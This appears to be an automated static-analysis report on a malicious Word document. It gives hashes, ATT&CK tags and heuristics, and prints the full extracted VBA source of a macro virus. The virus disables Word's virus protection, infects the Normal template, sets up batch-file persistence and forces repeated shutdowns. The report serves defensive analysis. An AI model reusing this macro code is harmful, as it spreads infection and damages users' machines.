Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164e03519bb49246…

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-10-11 17:35:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 228c91b5dbff3d01659c0fff0afb92cc SHA-1: 11707bae13b5fff8ac9defb3c91d01271d49d2b8 SHA-256: 164e03519bb492462a2734d45473aadedf774d6a7c5e620162f24f7bb34bc58c
168 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1505.003 Server Software Component: Service Execution T1059 Command and Scripting Interpreter

The sample is a Microsoft Word document containing a Document_Open VBA macro. This macro is designed to copy itself into the Normal template and the active document, effectively infecting them. It also utilizes the Shell() function, indicating an intent to execute arbitrary commands or payloads. The macro attempts to achieve AV stealth by modifying registry keys related to file associations.

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3343 bytes
SHA-256: 6bd02220373e28af9548082fcaf7cf1d7715d3b59ed1503349b857f9584ded8e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False
ShellDoc = Environ("WINDIR") & "\ShellNew\" & System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)

If Normal.ThisDocument.ReadOnly = 0 Then
    NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
    NormalTemplate.Save
Else
    SetAttr (NormalTemplate.FullName), vbArchive
End If

If ActiveDocument.ReadOnly = 0 Then
    AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode
    ActiveDocument.Save
End If

'>-- Check if we are Master Document
If UCase(ActiveDocument.FullName) = UCase(ShellDoc) Then
    ActiveDocument.Save
    NormalTemplate.Saved = True
    Application.Quit
End If

'>-- Infect Master Document
If ND.CountOfLines > 25 Then
    If GetAttr(ShellDoc) <> 0 Then
        SetAttr (ShellDoc), 0
        Shell Application.Path & "\Winword.exe " & ShellDoc, vbMinimizedNoFocus
    End If
End If
'AV Stealth in: HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew Filename
Randomize Timer
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
STL = "Ver_" & Int(Rnd * 9999) & ".dat"
If UCase(chkSt) <> Right(ShellDoc, Len(ShellDoc) - 12) Then Name ShellDoc As Environ("WinDir") & "\ShellNew\" & STL
System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename") = STL

'Reinkanation:
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
FileCopy NormalTemplate.FullName, Environ("WinDir") & "\Java\X.cls" 'Kopiere NormalTemplate
FileCopy Environ("WINDIR") & "\ShellNew\" & chkSt, Environ("WinDir") & "\Java\Y.cls"    'Kopiere Winword8.doc
x = Int(Rnd * 55) + 200: y = Int(Rnd * 19) + 238: z = Int(Rnd * 30) + 21    'Zufallszahlen

Open "Tarnkappe.bat" For Output As #1
    Print #1, "ren " & Environ("WinDir") & "\Java\X.cls " & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls"
    Print #1, "ren " & Environ("WinDir") & "\Java\Y.cls " & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls"
    Print #1, "del Tarnkappe.bat"
Open Environ("WinDir") & "\Winstart.bat" For Output As #2
    Print #2, "@echo off"
    Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls " & NormalTemplate.FullName
    Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls " & Environ("WinDir") & "\ShellNew\" & chkSt
Close
Shell "Tarnkappe.bat", vbHide

Eclipse:
If Day(Now) <> Month(Now) Then Exit Sub
Do
Shell Environ("WinDir") & "\Rundll32.exe Kernel32,SetSystemPowerState", vbHide  'The lord says power off
Loop
End Sub